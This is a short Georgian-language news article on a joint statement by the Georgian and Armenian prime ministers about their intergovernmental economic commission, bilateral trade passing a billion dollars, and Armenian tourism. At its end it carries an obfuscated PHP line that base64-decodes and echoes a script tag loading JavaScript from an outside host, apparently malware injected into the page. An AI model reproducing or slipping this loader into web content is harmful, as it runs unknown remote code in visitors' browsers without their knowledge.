celsiusi
ავერსი საქკაბელი

ჩვენ გვქონდა ეკონომიკური თანამშრომლობის მთავრობათაშორისი კომისიის მე-13 სხდომა, სადაც განვიხილეთ მნიშვნელოვანი საკითხები, რომელიც ეხება ვაჭრობას, ეკონომიკას, ზოგადად ურთიერთობებს, – ამის შესახებ საქართველოს პრემიერ-მინისტრმა, ირაკლი ღარიბაშვილმს სომხეთის პრემიერ-მინისტრ ნიკოლ ფაშინიანთან ერთობლივი განცხადებისას აღნიშნა.

როგორც ღარიბაშვილმა განაცხადა, საქართველოსა და სომხეთს შორის ვითარდება სავაჭრო ურთიერთობები და აღნიშნა, რომ სავაჭრო ბრუნვამ მილიარდ დოლარს გადააჭარბა.

„სომხეთი საქართველოსთვის არის რიგით მე-6 სავაჭრო პარტნიორი. ასევე, რიგით მე-2 საექსპორტო ქვეყანა, რაც, რა თქმა უნდა, ძალიან მისასალმებელია. ამასთან, გასულ წელს სომხეთიდან თითქმის მილიონი ტურისტი, ვიზიტორი გვესტუმრა, რაც ძალიან მნიშვნელოვანია ჩვენი ქვეყნისთვის, ქვეყნის ეკონომიკის განვითარებისთვის“, – განაცხადა ირაკლი ღარიბაშვილმა.

257
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");